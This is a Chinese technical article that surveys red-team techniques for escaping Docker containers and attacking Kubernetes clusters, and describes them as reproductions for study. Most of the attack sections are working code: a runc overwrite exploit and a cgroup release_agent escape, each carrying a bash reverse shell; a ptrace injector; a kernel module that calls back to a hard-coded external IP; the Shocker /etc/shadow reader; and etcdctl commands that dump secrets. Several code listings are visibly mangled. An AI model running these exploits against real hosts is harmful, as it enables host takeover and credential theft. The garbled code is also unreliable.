九个容器环境安全红队常用手法总结

系统 Linux
简单来说,容器是一种轻量级的应用及其运行环境打包技术,还包含依赖项,例如编程语⾔运⾏时的特定版本和运⾏软件服务所需的库。

 [[440592]]

引言

随着云原生的火热,容器及容器编排平台的安全也受到了行业关注,Gartner在近期发布的《K8s安全防护指导框架》中给出K8s安全的8个攻击面,总结如下:

镜像相关:

1. 镜像仓库安全

2. 容器镜像安全

K8S组件相关:

3.API Server

4.Controller Manager

5.Etcd

6.Kubelet

7.Kube-proxy

运行时安全:

8.Pod内攻击

9.容器逃逸

我们针对其中常见的红队攻击手法进行了复现与总结。

一、概念简介

简单来说,容器是一种轻量级的应用及其运行环境打包技术,还包含依赖项,例如编程语⾔运⾏时的特定版本和运⾏软件服务所需的库。容器⽀持在操作系统级别轻松共享 CPU、内存、存储空间和⽹络资源,并提供了⼀种逻辑打包机制,以这种机制打包的应⽤可以脱离其实际运⾏的环境。目前,Docker是使用最广泛的一种容器技术。

在开发、运维过程中,容器需要进行部署、管理、扩展和联网等操作,这就引入了一个新的概念,容器的编排。

容器编排是指自动化容器的部署、管理、扩展和联网。容器编排可以为需要部署和管理成百上千个容器和主机的企业提供便利。

容器编排可以在使用容器的任何环境中使用。这可以帮助在不同环境中部署相同的应用,而无需重新设计。通过将微服务放入容器,就能更加轻松地编排各种服务(包括存储、网络和安全防护)。

容器编排工具提供了用于大规模管理容器和微服务架构的框架。容器生命周期的管理有许多容器编排工具可用。一些常见的方案包括:Kubernetes、Docker Swarm 和 Apache Mesos。其中,目前使用最广的为 Kubernetes。

Kubernetes简称K8S,是 Google于2014年开源的容器编排调度管理平台。相比与Swarm、Mesos等平台简化了容器调度与管理,是目前最流行的容器编排平台,K8S主要功能如下:

1)容器调度管理:基于调度算法与策略将容器调度到对应的节点上运行。

2)服务发现与负载均衡:通过域名、VIP对外提供容器服务,提供访问流量负载均衡。

3)弹性扩展:定义期待的容器状态与资源,K8S自动检测、创建、删除实例和配置以满足要求。

4)自动恢复与回滚:提供健康检查,自动重启、迁移、替换或回滚运行失败或没响应的容器,保障服务可用性。

5)K8S对象管理:涉及应用编排与管理、配置、秘钥等、监控与日志等。

6)资源管理:对容器使用的网络、存储、GPU等资源进行管理。

二、容器安全机制

每个基础软件服务都存在安全风险,容器也不例外,其自身为控制安全问题的发生,有着自己的安全机制,在此以 Docker 为例,简单讲述容器的安全机制。

Docker 根据 Linux 系统的一些特性,引入了多种安全机制,包含 seccomp、capability、Apparmor等。

Seccomp

seccomp 是 Linux kernel 从2.6.23版本引入的一种简洁的 sandboxing 机制。

seccomp安全机制能使一个进程进入到一种“安全”运行模式,该模式下的进程只能调用4种系统调用(system call),即 read(), write(), exit() 和 sigreturn(),否则进程便会被终止。

Seccomp 简单来说就是一个白名单,每个进程进行系统调用的时候,内核都会检查对应的白名单来确认该进程是否有权限使用这个系统调用。

Linux capability

Capability 机制是 Linux 内核 2.2 之后引入的。本质上是将 root 用户的权限细分为不同的领域,可以分别的启用或者禁用。Docker 默认开启了14种capability,对容器内部 root权限进行了一系列限制。

Apparmor

AppArmor 是 Linux 内核的一个安全模块,通过它可以指定程序是否可以读、写或者运行哪些文件,是否可以打开网络端口等。若可执行文件的路径为 /home/ubuntu/run,使用 Apparmor 对其进行访问控制,需要在配置文件目录 /etc/apparmor.d 下新建一个名为 home.ubuntu.run 的文件,若修改 run 的文件名,配置文件将失效。

三、Docker安全问题与逃逸漏洞复现

尽管Docker本身具备Seccomp、Capability、Apparmor等Linux自带的安全机制,但仍存在Linux内核漏洞、Docker漏洞以及配置不当等安全问题。

1. Linux 内核漏洞

(1)原理

容器的内核与宿主内核共享,使⽤Namespace与Cgroups这两项技术,使容器内的资源与宿主机隔离,所以Linux内核产⽣的漏洞能导致容器逃逸。

容器逃逸和内核提权只有细微的差别,需要突破namespace的限制。将⾼权限的namespace赋到exploit进程的task_struct中。

容器逃逸简易模型

(2)Dirty Cow 引发的容器逃逸

在Linux内核的内存⼦系统处理私有只读内存映射的写时复制(Copy-on-Write,CoW)机制的⽅式中发现了⼀个竞争冲突。⼀个没有特权的本地⽤⼾,可能会利⽤此漏洞获得对其他情况下只读内存映射的写访问权限,从⽽增加他们在系统上的特权,这就是知名的Dirty CoW漏洞。

Dirty CoW 漏洞的逃逸的实现思路和上述的思路不太⼀样,采取Overwrite vDSO技术。

vDSO(Virtual Dynamic Shared Object)是内核为了减少内核与⽤⼾空间频繁切换,提⾼系统调⽤效率⽽设计的机制。它同时映射在内核空间以及每⼀个进程的虚拟内存中,包括那些以root权限运⾏的进程。通过调⽤那些不需要上下⽂切换(context switching)的系统调⽤可以加快这⼀步骤(定位vDSO)。vDSO在用户空间(userspace)映射为R/X,⽽在内核空间(kernelspace)则为R/W。这允许我们在内核空间修改它,接着在用户空间执⾏。⼜因为容器与宿主机内核共享,所以可以直接使⽤这项技术逃逸容器。

利⽤步骤如下:

1. 获取vDSO地址,在新版的glibc中可以直接调⽤getauxval()函数获取;

2. 通过vDSO地址找到clock_gettime()函数地址,检查是否可以hijack;

3. 创建监听socket;

4. 触发漏洞,Dirty CoW是由于内核内存管理系统实现CoW时产⽣的漏洞。通过条件竞争,把握好在恰当的时机,利⽤ CoW 的特性可以将⽂件的read-only映射该为write。⼦进程不停地检查是否成功写⼊。⽗进程创建⼆个线程,ptrace_thread线程向vDSO写⼊shellcode。madvise_thread线程释放vDSO映射空间,影响ptrace_thread线程CoW的过程,产⽣条件竞争,当条件触发就能写⼊成功。

5. 执⾏shellcode,等待从宿主机返回root shell,成功后恢复vDSO原始数据。

https://github.com/scumjr/dirtycow-vdso

2. Docker 漏洞

Docker 软件架构分为四个部分,集成许多组件,包括containerd、runc等等。

Docker Client是Docker的客户端程序,用于将用户请求发送给Dockerd。Dockerd 实际调用的是 containerd 的API接口,containerd 是 Dockerd 和 runc 之间的一个中间交流组件,主要负责容器运行、镜像管理等。containerd 向上为 Dockerd 提供了 gRPC 接口,使得 Dockerd 屏蔽下面的结构变化,确保原有接口向下兼容;向下,通过 containerd-shim 与 runc 结合创建及运行容器。

所以,若这些组件存在问题,也会带来 Docker 的安全问题。

1.CVE-2019-5736:runc - container breakout vulnerability

漏洞原理

runc 在使用文件系统描述符时存在漏洞,该漏洞可导致特权容器被利用,造成容器逃逸以及访问宿主机文件系统;攻击者也可以使用恶意镜像,或修改运行中的容器内的配置来利用此漏洞。

攻击方式1:(该途径无需特权容器)运行中的容器被入侵,系统文件被恶意篡改 ==> 宿主机运行docker exec命令,在该容器中创建新进程 ==> 宿主机runc被替换为恶意程序 ==> 宿主机执行docker run/exec 命令时触发执行恶意程序;

攻击方式2:(该途径无需特权容器)docker run命令启动了被恶意修改的镜像 ==> 宿主机runc被替换为恶意程序 ==> 宿主机运行docker run/exec命令时触发执行恶意程序。

当runc在容器内执行新的程序时,攻击者可以欺骗它执行恶意程序。通过使用自定义二进制文件替换容器内的目标二进制文件来实现指回 runc 二进制文件。

如果目标二进制文件是 /bin/bash,可以用指定解释器的可执行脚本替换 #!/proc/self/exe。因此,在容器内执行 /bin/bash,/proc/self/exe 的目标将被执行,将目标指向 runc 二进制文件。

然后攻击者可以继续写入 /proc/self/exe 目标,尝试覆盖主机上的 runc 二进制文件。这里需要使用 O_PATH flag打开 /proc/self/exe 文件描述符,然后以 O_WRONLY flag 通过/proc/self/fd/重新打开二进制文件,并且用单独的一个进程不停地写入。当写入成功时,runc会退出。

影响版本

docker version <=18.09.2 && RunC version <=1.0-rc6

漏洞利用

P.S. 该漏洞会替换原本主机 runc 文件,造成 Docker 服务不可用,需要引导被攻击人使用 exec 去执行/bin/sh 或者想要的任何操作。 

  1. package main  
  2. import (  
  3.   "fmt"  
  4.   "io/ioutil"  
  5.   "os"  
  6.   "strconv"  
  7.   "strings"  
  8.  
  9. // This is the line of shell commands that will execute on the host  
  10. var payload = "#!/bin/bash \n bash -i >& /dev/tcp/0.0.0.0/1234 0>&1"  
  11. func main() {  
  12.   // First we overwrite /bin/sh with the /proc/self/exe interpreter path  
  13.   fd, err :os.Create("/bin/sh")  
  14.   if err != nil {  
  15.     fmt.Println(err)  
  16.     return  
  17.   }  
  18.   fmt.Fprintln(fd, "#!/proc/self/exe")  
  19.   err = fd.Close()  
  20.   if err != nil {  
  21.     fmt.Println(err)  
  22.     return  
  23.   }  
  24.   fmt.Println("[+] Overwritten /bin/sh successfully")  
  25.   // Loop through all processes to find one whose cmdline includes runcinit  
  26.   // This will be the process created by runc  
  27.   var found int  
  28.   for found == 0 {  
  29.     pids, err :ioutil.ReadDir("/proc")  
  30.     if err != nil {  
  31.       fmt.Println(err)  
  32.       return  
  33.     }  
  34.     for _, f :range pids {  
  35.       fbytes, _ :ioutil.ReadFile("/proc/" + f.Name() + "/cmdline")  
  36.       fstring :string(fbytes)  
  37.       if strings.Contains(fstring, "runc") {  
  38.         fmt.Println("[+] Found the PID:", f.Name())  
  39.         found, err = strconv.Atoi(f.Name())  
  40.         if err != nil {  
  41.           fmt.Println(err)  
  42.           return  
  43.         }  
  44.       }  
  45.     }  
  46.   }  
  47.   // We will use the pid to get a file handle for runc on the host.  
  48.   var handleFd = -1  
  49.   for handleFd == -1 {  
  50.     // Note, you do not need to use the O_PATH flag for the exploit to work.  
  51.     handle, _ :os.OpenFile("/proc/"+strconv.Itoa(found)+"/exe", os.O_RDONLY, 0777)  
  52.     if int(handle.Fd()) > 0 {  
  53.       handleFd = int(handle.Fd())  
  54.     }  
  55.   }  
  56.   fmt.Println("[+] Successfully got the file handle")  
  57.   // Now that we have the file handle, lets write to the runc binary and overwrite it  
  58.   // It will maintain it's executable flag  
  59.   for {  
  60.     writeHandle, _ :os.OpenFile("/proc/self/fd/"+strconv.Itoa(handleFd), os.O_WRONLY|os.O_TRUNC, 0700)  
  61.     if int(writeHandle.Fd()) > 0 { 
  62.       fmt.Println("[+] Successfully got write handle", writeHandle)  
  63.       writeHandle.Write([]byte(payload))  
  64.       return  
  65.     }  
  66.   }  

2.CVE-2019-14271:docker cp

vulnerability

漏洞原理

docker cp的逻辑漏洞导致宿主机进程会使用容器的 so 库,而容器的 so 库我们目前是可控的,我们可以编译一个恶意so库对原生的镜像库进行替换,使宿主进程调用恶意so库过程中执行攻击者定义的危险代码。寻找到 libnss_files.so.2 的源码,在其中加入链接时启动代码(run_at_link),并定义执行函数,之后对其进行编译,将新生成的libnss_files.so.2送往容器中触发恶意指令。

影响版本

影响版本只有docker 19.03.0(包含几个beta版),19.03.1以上以及18.09以下都不受影响。

3.CVE-2020-15257:docker-containerd  --network=host breakout vulnerability

漏洞原理

该漏洞是由在特定网络环境下Docker容器内部可以访问宿主机的containerdAPI引起的。containerd在操作runC时,会创建相应进程并生成一个抽象socket,docker通过该socket与容器进行控制与通信。该socket可以在宿主机的/proc/net/unix文件中查找到,当Docker容器内部共享了宿主机的网络时,便可通过加载该socket,来控制Docker容器,引发逃逸。

漏洞利用

https://github.com/ZhuriLab/Exploits/tree/master/cve-2020-15257

3.配置不当

1.Docker API 暴露

docker -H tcp://0.0.0.0:2375 去访问创建等,或者使用 UI

2.特权容器

特权容器意味着拥有所有的 Capability,即与宿主机 ROOT 权限一致,特权容器逃逸方法有很多。例如,通过挂载硬盘逃逸:

● fdisk -l

● mount xxx /mnt

3.Capability 权限过大

查看 Docker 所拥有的 Capability

cat /proc/1/status | grep Cap

capsh --decode=00000000a80425fb

① 拥有 SYS_ADMIN 权限

通过 cgroup 进行逃逸,需要--security-opt apparmor=unconfined 

  1. # In the container   
  2. mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x   
  3. echo 1 > /tmp/cgrp/x/notify_on_release   
  4. host_path=/var/lib/docker/overlay2/e1665b79172f92e72f785c4f1e22f517c5b737ddd8c75504442fbc85f4a13619/diff   
  5. echo "/var/lib/docker/overlay2/e1665b79172f92e72f785c4f1e22f517c5b737ddd8c75504442fbc85f4a13619/diff/cmd" > /tmp   
  6. /cgrp/release_agent   
  7. echo '#!/bin/sh' > /cmd   
  8. echo "bash -c 'bash -i >& /dev/tcp/0.0.0.0/1234 0>&1'" >> /cmd   
  9. chmod a+x /cmd   
  10. sh -c "echo $$ > /tmp/cgrp/x/cgroup.procs"  

② 拥有SYS_PTRACE 权限

进程注入引发逃逸,需要 --pid=host 以及--security-opt apparmor=unconfined 

  1. #include <stdio.h>  
  2. #include <stdlib.h>  
  3. #include <string.h>  
  4. #include <stdint.h>  
  5. #include <sys/ptrace.h>  
  6. #include <sys/types.h>  
  7. #include <sys/wait.h>  
  8. #include <unistd.h>  
  9. #include <sys/user.h>  
  10. #include <sys/reg.h>  
  11. #define SHELLCODE_SIZE 0  
  12. unsigned char *shellcode =   
  13. "" 
  14. int inject_data (pid_t pid, unsigned char *src, void *dst, int len)  
  15.  
  16.  int i;  
  17.  uint32_t *s = (uint32_t *) src;  
  18.  uint32_t *d = (uint32_t *) dst;  
  19.  for (i = 0; i < len; i+=4, s++, d++)  
  20.  {  
  21.  if ((ptrace (PTRACE_POKETEXT, pid, d, *s)) < 0 
  22.  { 
  23.  perror ("ptrace(POKETEXT):");  
  24.  return -1;  
  25.  }  
  26.  }  
  27.  return 0;  
  28.  
  29. int main (int argc, char *argv[])  
  30.  
  31.  pid_t target;  
  32.  struct user_regs_struct regs;  
  33.  int syscall;  
  34.  long dst;  
  35.  if (argc != 2)  
  36.  {  
  37.  fprintf (stderr, "Usage:\n\t%s pid\n", argv[0]);  
  38.  exit (1);  
  39.  }  
  40.  target = atoi (argv[1]);  
  41.  printf ("+ Tracing process %d\n", target);  
  42.  if ((ptrace (PTRACE_ATTACH, target, NULL, NULL)) < 0 
  43.  {  
  44.  perror ("ptrace(ATTACH):");  
  45.  exit (1);  
  46.  }  
  47.  printf ("+ Waiting for process...\n");  
  48.  wait (NULL);  
  49.  printf ("+ Getting Registers\n");  
  50.  if ((ptrace (PTRACE_GETREGS, target, NULL, &regs)) < 0 
  51.  {  
  52.  perror ("ptrace(GETREGS):");  
  53.  exit (1);  
  54.  }  
  55.  /* Inject code into current RPI position */  
  56.  printf ("+ Injecting shell code at %p\n", (void*)regs.rip);  
  57.  inject_data (target, shellcode, (void*)regs.rip, SHELLCODE_SIZE);  
  58.  regs.rip += 2;  
  59.  printf ("+ Setting instruction pointer to %p\n", (void*)regs.rip);  
  60.  if ((ptrace (PTRACE_SETREGS, target, NULL, &regs)) < 0 
  61.  {  
  62.  perror ("ptrace(GETREGS):");  
  63.  exit (1);  
  64.  }  
  65.  printf ("+ Run it!\n");  
  66.  if ((ptrace (PTRACE_DETACH, target, NULL, NULL)) < 0 
  67.  {  
  68.  perror ("ptrace(DETACH):");  
  69.  exit (1);  
  70.  }  
  71.  return 0;  

③ 拥有SYS_MODULE 权限

加载内核模块直接逃逸 

  1. #include <linux/module.h> /* Needed by all modules */  
  2. #include <linux/kernel.h> /* Needed for KERN_INFO */  
  3. #include <linux/init.h> /* Needed for the macros */  
  4. #include <linux/sched/signal.h>  
  5. #include <linux/nsproxy.h>  
  6. #include <linux/proc_ns.h>  
  7. ///< The license type -- this affects runtime behavior  
  8. MODULE_LICENSE("GPL");  
  9. ///< The author -- visible when you use modinfo  
  10. MODULE_AUTHOR("Nimrod Stoler");  
  11. ///< The description -- see modinfo  
  12. MODULE_DESCRIPTION("NS Escape LKM");  
  13. ///< The version of the module  
  14. MODULE_VERSION("0.1");  
  15. static int __init escape_start(void)  
  16.  int rc;  
  17.  static char *envp[] = {  
  18.  "SHELL=/bin/bash",  
  19.  "HOME=/home/cyberark",  
  20.  "USER=cyberark",  
  21.  "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin",  
  22.  "DISPLAY=:0",  
  23.  NULL};  
  24.  char *argv[] = {"/bin/bash","-c", "bash -i >& /dev/tcp/106.55.159.102/9999 0>&1", NULL};  
  25.  rc = call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);  
  26.  printk("RC is: %i \n", rc);  
  27.  return 0;  
  28.  
  29. static void __exit escape_end(void)  
  30.  
  31.  printk(KERN_EMERG "Goodbye!\n");  
  32.  
  33. module_init(escape_start);  
  34. module_exit(escape_end);  
  35. -----------------------  
  36. ifneq ($(KERNELRELEASE),)  
  37. obj-m :=exp.o  
  38. else  
  39. KDIR :=/lib/modules/$(shell uname -r)/build  
  40. all:  
  41.  make -C $(KDIR) M=$(PWD) modules  
  42. clean:  
  43.  rm -f *.ko *.o *.mod.o *.mod.c *.symvers *.order  
  44. endif 

4.dac_read_search

Shocker攻击 

  1. #define _GNU_SOURCE  
  2. #include <stdio.h>  
  3. #include <sys/types.h>  
  4. #include <sys/stat.h>  
  5. #include <fcntl.h>  
  6. #include <errno.h>  
  7. #include <stdlib.h>  
  8. #include <string.h>  
  9. #include <unistd.h>  
  10. #include <dirent.h>  
  11. #include <stdint.h>  
  12. struct my_file_handle  
  13.  
  14.  unsigned int handle_bytes;  
  15.  int handle_type;  
  16.  unsigned char f_handle[8];  
  17. };  
  18. void die(const char *msg)  
  19.  
  20.  perror(msg);  
  21.  exit(errno);  
  22.  
  23. void dump_handle(const struct my_file_handle *h)  
  24.  
  25.  fprintf(stderr, "[*] #=%d, %d, char nh[] = {", h->handle_bytes,  
  26.  h->handle_type);  
  27.  for (int i = 0; i < h->handle_bytes; ++i)  
  28.  {  
  29.  fprintf(stderr, "0x%02x", h->f_handle[i]);  
  30.  if ((i + 1) % 20 == 0) 
  31.  fprintf(stderr, "\n");  
  32.  if (i < h->handle_bytes - 1)  
  33.  fprintf(stderr, ", ");  
  34.  }  
  35.  fprintf(stderr, "};\n");  
  36.  
  37. int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle *oh)  
  38.  
  39.  int fd;  
  40.  uint32_t ino = 0 
  41.  struct my_file_handle outh = {  
  42.  .handle_bytes = 8 
  43.  .handle_type = 1};  
  44.  DIR *dir = NULL 
  45.  struct dirent *de = NULL 
  46.  path = strchr(path, '/');  
  47.  // recursion stops if path has been resolved  
  48.  if (!path)  
  49.  {  
  50.  memcpy(oh->f_handle, ih->f_handle, sizeof(oh->f_handle));  
  51.  oh->handle_type = 1 
  52.  oh->handle_bytes = 8 
  53.  return 1;  
  54.  }  
  55.  ++path;  
  56.  fprintf(stderr, "[*] Resolving '%s'\n", path);  
  57.  if ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0 
  58.  die("[-] open_by_handle_at");  
  59.  if ((dir = fdopendir(fd)) == NULL)  
  60.  die("[-] fdopendir");  
  61.  for (;;)  
  62.  {  
  63.  de = readdir(dir);  
  64.  if (!de)  
  65.  break;  
  66.  fprintf(stderr, "[*] Found %s\n", de->d_name);  
  67.  if (strncmp(de->d_name, path, strlen(de->d_name)) == 0)  
  68.  {  
  69.  fprintf(stderr, "[+] Match: %s ino=%d\n", de->d_name, (int)de->d_ino);  
  70.  ino = de->d_ino;  
  71.  break;  
  72.  }  
  73.  }  
  74. fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n");  
  75.  if (de)  
  76.  {  
  77.  for (uint32_t i = 0; i < 0xffffffff; ++i)  
  78.  {  
  79.  outh.handle_bytes = 8 
  80.  outh.handle_type = 1 
  81.  memcpy(outh.f_handle, &ino, sizeof(ino));  
  82.  memcpy(outh.f_handle + 4, &i, sizeof(i));  
  83.  if ((i % (1 << 20)) == 0)  
  84.  fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de->d_name, i);  
  85.  if (open_by_handle_at(bfd, (struct file_handle *)&outh, 0) > 0)  
  86.  {  
  87.  closedir(dir);  
  88.  close(fd);  
  89.  dump_handle(&outh);  
  90.  return find_handle(bfd, path, &outh, oh);  
  91.  }  
  92.  }  
  93.  }  
  94.  closedir(dir);  
  95.  close(fd);  
  96.  return 0;  
  97.  
  98. int main()  
  99.  
  100.  char buf[0x1000];  
  101.  int fd1, fd2;  
  102.  struct my_file_handle h;  
  103.  struct my_file_handle root_h = {  
  104.  .handle_bytes = 8 
  105.  .handle_type = 1 
  106.  .f_handle = {0x02, 0, 0, 0, 0, 0, 0, 0}};  
  107.  fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n"  
  108.  "[***] The tea from the 90's kicks your sekurity again. [***]\n"  
  109.  "[***] If you have pending sec consulting, I'll happily [***]\n"  
  110.  "[***] forward to my friends who drink secury-tea too! [***]\n");  
  111.  // get a FS reference from something mounted in from outside  
  112.  if ((fd1 = open("/.dockerinit", O_RDONLY)) < 0 
  113.  die("[-] open");  
  114.  if (find_handle(fd1, "/etc/shadow", &root_h, &h) <= 0)  
  115.  die("[-] Cannot find valid handle!");  
  116.  fprintf(stderr, "[!] Got a final handle!\n");  
  117.  dump_handle(&h);  
  118.  if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0) 
  119.  die("[-] open_by_handle");  
  120.  memset(buf, 0, sizeof(buf));  
  121.  if (read(fd2, buf, sizeof(buf) - 1) < 0 
  122.  die("[-] read");  
  123.  fprintf(stderr, "[!] Win! /etc/shadow output follows:\n%s\n", buf);  
  124.  close(fd2);  
  125.  close(fd1);  
  126.  return 0;  

5.其他

通过内核漏洞进行逃逸时,有可能存在有些系统调用被禁用而使漏洞无法复现的情况,当一些 Capability 被赋予时可以使得原先不能在容器内使用的 kernel 漏洞可以使用,例如:

特殊目录被挂载至 Docker 内部引发逃逸

当例如宿主机的内的 /, /etc/, /root/.ssh 等目录的写权限被挂载进容器时,在容器内部可以修改宿主机内的 /etc/crontab、/root/.ssh/、/root/.bashrc 等文件执行任意命令,就可以导致容器逃逸。

① Docker in Docker

其中一个比较特殊且常见的场景是当宿主机的 /var/run/docker.sock 被挂载容器内的时候,容器内就可以通过 docker.sock 在宿主机里创建任意配置的容器,此时可以理解为可以创建任意权限的进程,当然也可以控制任意正在运行的容器。

使用 golang 去调用 unix://docker socket,去创建新的 Docker。

② 挂载了主机 /proc 目录

●从 mount 信息中找出宿主机内对应当前容器内部文件结构的路径。 

  1. sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab 

●因为宿主机内的 /proc 文件被挂载到了容器内的 /host_proc 目录,所以我们修改 /host_proc/sys/kernel/core_pattern 文件以达到修改宿主机 /proc/sys/kernel/core_pattern 的目的。 

  1. echo -e “|/var/lib/docker/overlay2/a1a1e60a9967d6497f22f5df21b185708403e2af22eab44cfc2de05ff8ae115f/diff/exp.sh \rcore “ > /host_proc/sys/kernel/core_pattern 

●需要一个程序在容器里执行并触发 segmentation fault 使植入的 payload 即 exp.sh 在宿主机执行。 

  1. #include <stdio.h>  
  2. int main() {  
  3.  int *a = NULL 
  4.  *a = 1 
  5.  return 0;  

四、K8s安全问题与漏洞复现

K8S 作为使用最多的容器编排软件,一些错误的配置会引发很多安全问题,使得集群失陷。

1.利用大权限的 Service Account 逃逸

使用Kubernetes做容器编排的话,在POD启动时,Kubernetes会默认为容器挂载一个 Service Account 证书。同时,默认情况下Kubernetes会创建一个特有的 Service 用来指向 ApiServer。

有了这两个条件,我们就拥有了在容器内直接和APIServer通信和交互的方式。

类似 Docker 中 capability 的赋予,在创建 pod 时制定使用已经给了特定权限的 SA,然后可以通过 kubectl 去进行一些列操作。

● kubectl edit sa sa-name -n namespace //

● kubectl create -f pod.yaml // sa pod

● ./kubectl .

2. 容器组件未鉴权

● kube-apiserver: 6443, 8080

● kubectl proxy: 8080, 8081

● kubelet: 10250, 10255, 4149

● dashboard: 30000

● docker api: 2375

● etcd: 2379, 2380

● kube-controller-manager: 10252

● kube-proxy: 10256, 31442

● kube-scheduler: 10251

● weave: 6781, 6782, 6783

● kubeflow-dashboard: 8080

1.组件分工

① 用户与 kubectl 或者 Kubernetes Dashboard 进行交互,提交需求。(例: kubectl create -f pod.yaml)

② kubectl 会读取 ~/.kube/config 配置,并与 apiserver 进行交互,协议:http/https

③ apiserver 会协同 ETCD 等组件准备下发新建容器的配置给到节点,协议:http/https(除 ETCD 外还有例如 kube-controller-manager,

④ scheduler等组件用于规划容器资源和容器编排方向)

⑤ apiserver 与 kubelet 进行交互,告知其容器创建的需求,协议:http/https

⑥ kubelet 与Docker等容器引擎进行交互,创建容器,协议:http/unix socket

2.API Server

默认情况下,apiserver 都是有鉴权的

但也有未鉴权的配置,此时请求接口的结果如下:

对于这类的未鉴权的设置来说,访问到 apiserver 一般情况下就获取了集群的权限

3.Kubelet

每一个Node节点都有一个kubelet服务,kubelet监听了10250,10248,10255等端口。

其中10250端口是kubelet与apiserver进行通信的主要端口,通过该端口kubelet可以知道自己当前应该处理的任务,该端口在最新版Kubernetes是有鉴权的,但在开启了接受匿名请求的情况下,不带鉴权信息的请求也可以使用10250提供的能力。

在新版本Kubernetes中当使用以下配置打开匿名访问时便可能存在kubelet未授权访问漏洞:

执行命令

4.Dashboard

dashboard是Kubernetes官方推出的控制Kubernetes的图形化界面,在Kubernetes配置不当导致dashboard未授权访问漏洞的情况下,通过dashboard我们可以控制整个集群。

 在dashboard中默认是存在鉴权机制的,用户可以通过kubeconfig或者Token两种方式登录,当用户开启了enable-skip-login时可以在登录界面点击Skip跳过登录进入dashboard。

然而通过点击Skip进入dashboard默认是没有操作集群的权限的,因为Kubernetes使用RBAC(Role-based access control)机制进行身份认证和权限管理,不同的serviceaccount拥有不同的集群权限。

我们点击Skip进入dashboard实际上使用的是Kubernetes-dashboard这个ServiceAccount,如果此时该ServiceAccount没有配置特殊的权限,是默认没有办法达到控制集群任意功能的程度的。

但有些开发者为了方便或者在测试环境中会为Kubernetes-dashboard绑定cluster-admin这个ClusterRole(cluster-admin拥有管理集群的最高权限)。

5.etcd

etcd 被广泛用于存储分布式系统或机器集群数据,其默认监听了2379等端口,如果2379端口暴露,可能造成敏感信息泄露。

Kubernetes默认使用了etcd v3来存储数据,如果我们能够控制Kubernetes etcd服务,也就拥有了整个集群的控制权。 

  1. export ETCDCTL_API=3  
  2. etcdctl endpoint health  
  3. etcdctl get / --prefix --keys-only | grep /secrets/ 

 

  1. etcdctl get /registry/secrets/kube-system/clusterrole-aggregation-controller-token-pkkd5 

 

 

责任编辑:庞桂玉 来源: 奇妙的Linux世界
相关推荐

2024-04-18 12:12:01

2022-06-22 11:09:21

网络钓鱼网络攻击

2023-11-08 07:10:17

2014-07-09 10:34:49

2022-09-02 09:04:05

机器学习评估

2021-09-26 09:18:10

KnockOutloo安全工具红队

2022-08-08 12:00:34

网络安全攻防演练

2023-11-23 19:07:33

2024-10-21 13:11:50

2024-10-16 16:36:22

2021-08-11 05:03:27

工具渗透网络

2010-12-30 09:49:20

2023-09-12 15:02:33

2023-07-26 07:59:28

2020-12-17 14:39:20

网络安全

2022-03-26 19:25:40

Python包Python开发

2011-05-07 14:39:00

投影

2009-10-30 09:06:49

Internet接入方

2010-04-30 14:48:31

Windows 7安全

2024-11-21 15:29:34

点赞
收藏

51CTO技术栈公众号